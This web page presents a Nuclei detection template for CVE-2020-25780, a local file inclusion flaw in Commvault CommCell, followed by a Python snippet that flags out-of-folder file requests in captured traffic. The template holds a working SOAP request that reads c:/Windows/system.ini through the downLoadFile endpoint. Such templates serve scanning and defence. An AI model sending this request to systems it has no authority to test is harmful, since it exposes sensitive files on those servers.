Commvault CommCell - Local File Inclusion
ID: CVE-2020-25780
Severity: high
Author: pdteam
Tags: cve,cve2020,commvault,lfi
Description
CommCell in Commvault before 14.68, 15.x before 15.58, 16.x before 16.44, 17.x before 17.29, and 18.x before 18.13 is vulnerable to local file inclusion because an attacker who can view a log file can instead view a file outside of the log-files folder.
YAML Source
id: CVE-2020-25780

info:
  name: Commvault CommCell - Local File Inclusion
  author: pdteam
  severity: high
  description: CommCell in Commvault before 14.68, 15.x before 15.58, 16.x before 16.44, 17.x before 17.29, and 18.x before 18.13 are vulnerable to local file inclusion because an attacker can view a log file can instead view a file outside of the log-files folder.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the system.
  remediation: |
    Apply the latest security patches or updates provided by Commvault to fix the local file inclusion vulnerability.
  reference:
    - https://srcincite.io/blog/2021/11/22/unlocking-the-vault.html
    - http://kb.commvault.com/article/63264
    - https://nvd.nist.gov/vuln/detail/CVE-2020-25780
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2020-25780
    cwe-id: CWE-22
    epss-score: 0.0562
    epss-percentile: 0.93279
    cpe: cpe:2.3:a:commvault:commcell:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: commvault
    product: commcell
  tags: cve,cve2020,commvault,lfi

http:
  - method: POST
    path:
      - "http://{{Host}}:81/SearchSvc/CVSearchService.svc"

    body: |
      <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/">
         <soapenv:Header/>
         <soapenv:Body>
            <tem:downLoadFile>
               <tem:path>c:/Windows/system.ini</tem:path>
            </tem:downLoadFile>
         </soapenv:Body>
      </soapenv:Envelope>

    headers:
      Cookie: Login
      soapaction: http://tempuri.org/ICVSearchSvc/downLoadFile
      content-type: text/xml

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "downLoadFileResult"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100a437411db25ad1009d4f6fbe3c3846b5f5dcf6bf2e2cdbc4ec33a0582458a72d022100e77f40da2e31c10b79cbfdb78b24ed872f05fc2f873d8e2851929ea329c71975:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2020/CVE-2020-25780.yaml"
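
On the defensive side, the same downLoadFile request can be reviewed in captured traffic or proxy logs by checking whether the requested path stays inside the log-files folder. The following is an added example, not part of the template or of Commvault's code; LOG_DIR is a hypothetical folder and the function names are illustrative.

```python
import ntpath
import xml.etree.ElementTree as ET

NS = {"tem": "http://tempuri.org/"}
# Assumption: hypothetical log folder; the page does not give the real location.
LOG_DIR = r"C:\Program Files\Commvault\Log Files"

# Constructed sample: the SOAP body carried by the template above.
SAMPLE = """<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/">
  <soapenv:Header/>
  <soapenv:Body>
    <tem:downLoadFile>
      <tem:path>c:/Windows/system.ini</tem:path>
    </tem:downLoadFile>
  </soapenv:Body>
</soapenv:Envelope>"""


def requested_paths(soap_body):
    """Return every <tem:path> value found inside a downLoadFile call."""
    root = ET.fromstring(soap_body)
    nodes = root.findall(".//tem:downLoadFile/tem:path", NS)
    return [(n.text or "").strip() for n in nodes]


def is_inside(path, base=LOG_DIR):
    """True only if path, normalised with Windows rules, stays under base."""
    norm_base = ntpath.normcase(ntpath.normpath(base))
    # Relative names are resolved against the log folder; an absolute path
    # (with or without a drive letter) replaces it, as ntpath.join defines.
    norm_path = ntpath.normcase(ntpath.normpath(ntpath.join(base, path)))
    try:
        # Component-wise comparison, so "Log Files Old" does not pass as a
        # child of "Log Files" the way a plain string-prefix test would.
        return ntpath.commonpath([norm_base, norm_path]) == norm_base
    except ValueError:  # different drive or UNC share
        return False


def flag_request(soap_body):
    """List the requested paths that resolve outside the log folder."""
    return [p for p in requested_paths(soap_body) if not is_inside(p)]


if __name__ == "__main__":
    print(flag_request(SAMPLE))
```

When the SOAP bodies come from untrusted traffic, parse them with a hardened XML parser such as defusedxml instead of the standard-library ElementTree.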